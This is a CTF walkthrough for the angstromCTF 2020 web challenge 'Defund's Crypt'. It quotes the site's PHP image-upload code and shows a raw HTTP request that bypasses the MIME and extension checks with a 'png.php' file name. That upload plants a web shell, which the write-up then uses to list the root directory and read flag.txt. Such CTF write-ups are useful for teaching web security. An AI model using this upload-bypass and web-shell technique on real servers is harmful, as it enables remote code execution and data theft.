Tags: php rce web 

Rating: 1.0

# ▼▼▼Defund's Crypt(Web、120pts、304/1596=19.0%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

`https://crypt.2020.chall.actf.co/src.php`

```

<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="https://fonts.googleapis.com/css?family=Inconsolata|Special+Elite&display=swap" rel="stylesheet">
<link rel="stylesheet" href="/style.css">
<title>Defund's Crypt</title>
</head>
<body>


<h1>Defund's Crypt<span>o</span></h1>
1000000) {
throw new RuntimeException('People can only remember so much..');
}
$finfo = new finfo(FILEINFO_MIME_TYPE);
if (false === $ext = array_search(
$finfo->file($_FILES['imgfile']['tmp_name']),
array(
'.jpg' => 'image/jpeg',
'.png' => 'image/png',
'.bmp' => 'image/bmp',
),
true
)) {
throw new RuntimeException("Your memory isn't picturesque enough to be remembered.");
}
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {
throw new RuntimeException("The name of your memory doesn't seem to match its content.");
}
$bname = basename($_FILES["imgfile"]["name"]);
$fname = sprintf("%s%s", sha1_file($_FILES["imgfile"]["tmp_name"]), substr($bname, strpos($bname, ".")));
if (!move_uploaded_file(
$_FILES['imgfile']['tmp_name'],
"./memories/" . $fname
)) {
throw new RuntimeException('Your memory failed to be remembered.');
}
http_response_code(301);
header("Location: /memories/" . $fname);
} catch (RuntimeException $e) {
echo "

" . $e->getMessage() . "

";
}
}
?>

<form method="POST" action="/" autocomplete="off" spellcheck="false" enctype="multipart/form-data">

Leave a memory:


<input type="file" id="imgfile" name="imgfile">
<label for="imgfile" id="imglbl">Choose an image...</label>
<input type="submit" value="Descend">
</form>
<script>
imgfile.oninput = _ => {
imgfile.classList.add("satisfied");
imglbl.innerText = imgfile.files[0].name;
};
</script>
</body>
</html>
```

```
if (false === $ext = array_search(
$finfo->file($_FILES['imgfile']['tmp_name']),
array(
'.jpg' => 'image/jpeg',
'.png' => 'image/png',
'.bmp' => 'image/bmp',
),
true
)) {
throw new RuntimeException("Your memory isn't picturesque enough to be remembered.");
}
if (strpos($_FILES["imgfile"]["name"], $ext) === false) {

throw new RuntimeException("The name of your memory doesn't seem to match its content.");
}
```

In order to pass this path, for example, `MMEType may be set to png` and `the same extension name png` may be present in the file name.

```
POST / HTTP/1.1
Host: crypt.2020.chall.actf.co
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrDvxOBjItkRppQlH
Content-Length: 234

------WebKitFormBoundaryrDvxOBjItkRppQlH
Content-Disposition: form-data; name="imgfile"; filename="hacker_white1.png.php"
Content-Type: image/png

?PNG

------WebKitFormBoundaryrDvxOBjItkRppQlH--
```

```
Location: /memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php
```

---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=ls%20/`

```
?PNG ? bin boot dev etc flag.txt home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
```

---

`https://crypt.2020.chall.actf.co/memories/0e2d1102b4a852aec56ebf7292db3400e9db253d.png.php?cmd=cat%20/flag.txt`

`{actf{th3_ch4ll3ng3_h4s_f4ll3n_but_th3_crypt_rem4ins}`